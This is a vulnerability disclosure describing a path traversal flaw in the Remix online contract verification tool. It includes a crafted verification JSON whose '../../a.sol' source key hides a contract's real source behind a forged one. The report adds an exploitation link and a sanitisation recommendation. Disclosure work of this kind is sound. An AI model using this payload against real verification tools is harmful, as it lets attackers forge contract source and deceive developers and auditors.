Description
Path Traversal Issue in Remix Online Contract Verification Tool.
Introduction
A path traversal issue (`../` in source file paths) has been discovered in the Remix Contract Verification Tool. It allows an attacker to redirect verification file paths to upper directories, thereby hiding the real contract source file and modifying other files in Remix. The result is a source code forgery issue that can deceive users and auditors during contract verification, and it may affect developers who use Remix to develop their contracts when they use the Contract Verification Tool.
By constructing a specially crafted JSON file for source code verification, an attacker can exploit a flaw in Remix's directory handling. The actual source file ../../a.sol is overwritten and hidden while the fake malicious source file is displayed in the directory, and other crafted files overwrite the user's own source code in Remix.
Example JSON
Below is an example JSON file demonstrating the issue (the contract bodies are line-separated with `\n` so the file is valid JSON):

```json
{
  "language": "Solidity",
  "sources": {
    "a.sol": {
      "content": "// SPDX-License-Identifier: GPL-3.0\npragma solidity >=0.7.0 <0.9.0;\ncontract Owner {\n    address private Hacker;\n    function bad(address newOwner) public {\n        Hacker = address(0x0);\n    }\n}"
    },
    "../../a.sol": {
      "content": "// SPDX-License-Identifier: GPL-3.0\npragma solidity >=0.7.0 <0.9.0;\ncontract Owner {\n    address private owner;\n    function changeOwner(address newOwner) public {\n        owner = newOwner;\n    }\n}"
    }
  },
  "settings": {}
}
```
By submitting this crafted JSON file, the actual source file ../../a.sol is concealed, while the fake file a.sol with malicious code is displayed in the directory. At the same time, the other attack payloads overwrite other files in Remix.
Below are links illustrating the exploitation:
https://sepolia.etherscan.deth.net/address/0xb7e278f0116508c611f8a486666d3823e51c44dc
Recommendations
- Implement strict path sanitization to prevent the use of `../` for directory traversal.
We also found the same issue in Forge, Metasuite, Blockscan and crytic-based tools like Slither, so this is a common issue for code fetcher tools, but we also think it is a risky issue that needs some better practice.
Thank you very much for providing such a powerful tool; it is a great convenience for us, and hopefully this discovery will allow me to contribute something to the tool.